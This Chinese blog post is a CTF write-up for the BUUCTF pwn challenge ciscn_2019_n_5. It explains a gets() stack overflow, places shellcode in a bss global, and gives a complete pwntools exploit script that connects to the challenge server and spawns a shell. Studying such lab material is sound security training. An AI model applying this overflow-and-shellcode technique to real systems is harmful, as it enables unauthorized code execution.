buuctf|pwn-ciscn_2019_n_5-wp

最新推荐文章于 2023-06-23 18:31:29 发布
最新推荐文章于 2023-06-23 18:31:29 发布
阅读量187 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121223929
版权

1.例行检查保护机制

 

2.我们用64位的IDA打开该文件

shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串

 

3.我们进入main函数看看

 我们可以看出gets(text,name)这里造成溢出

我们再去看看name,然后发现name是bss段上的全局变量

又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限

shellcode = asm(shellcraft.sh())            #这个语句是生成shellcode,以便我们拿到权限

text:0x20

 

 

4.EXP

#encoding = utf-8
from pwn import * 
from LibcSearcher import * 

context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0

def main():
	if content == 1:
		p = process('ciscn_2019_n_5')
	else:
		p = remote('node4.buuoj.cn',28835)
	
	#.bss:0000000000601080 name 
	name_bss_addr = 0x0601080
	shellcode     = asm(shellcraft.sh())
	payload = b'a' * (0x20+0x8) + p64(name_bss_addr)
	p.recvuntil("tell me your name\n")
	p.sendline(shellcode)
	p.recvuntil("What do you want to say to me?\n")
	p.sendline(payload)
	p.interactive()
main()

 

L__y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1384
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUU刷题-Pwn-ciscn_2019_n_5
一个啥也不会的小菜鸡!
06-23 60
通过向name中写入shellcode,并执行该shellcode。
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3159
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
【CTF】ciscn_2019_n_5
凉水的博客
04-22 874
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
ciscn_2019_n_5
m0sway的博客
03-29 200
ciscn_2019_n_5 WriteUp BUU_PWN
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 654
[buuctf]ciscn_2019_n_5
BUUCTFPWNciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 370
BUUCTFPWNciscn_2019_n_5题解
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 297
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1575
buuctf ciscn_2019_ne_5题目分析
BUUCTF pwn——ciscn_2019_n_5
CNS-Enterprise BCC-1701-J
04-07 158
BUUCTF 做题练习
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2248
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2225
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
WIKI|PEN-ret2text-WP
l2645470582_的博客
01-12 2035
1.检查保护机制 (1)开启堆栈不可执行保护 (2)该文件是32位文件 2.用32位IDA打开该文件 (1)先运行试试看 (2)shift+f12查看关键字符串 我们看到有system("/bin/sh")关键字符串 (3)进入main函数看看 看到gets()函数我们就看到溢出点了。S:0x64 我们构造payload #encoding = utf-8 from pwn import* context(os = 'linux',arch = 'i...
PWN|工具下载
l2645470582_的博客
11-01 1019
1.Linux/Ubuntu下载pwntools sudo pip install -U pwntools 2.Linux/Ubuntu下载checksec git clone https://github.com/slimm609/checksec.sh 3.Linux/Ubuntu下载gdb调试工具 sudo apt-get update sudo apt-get install gdb 4.Linux/Ubuntu下载LibcSearcher ...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值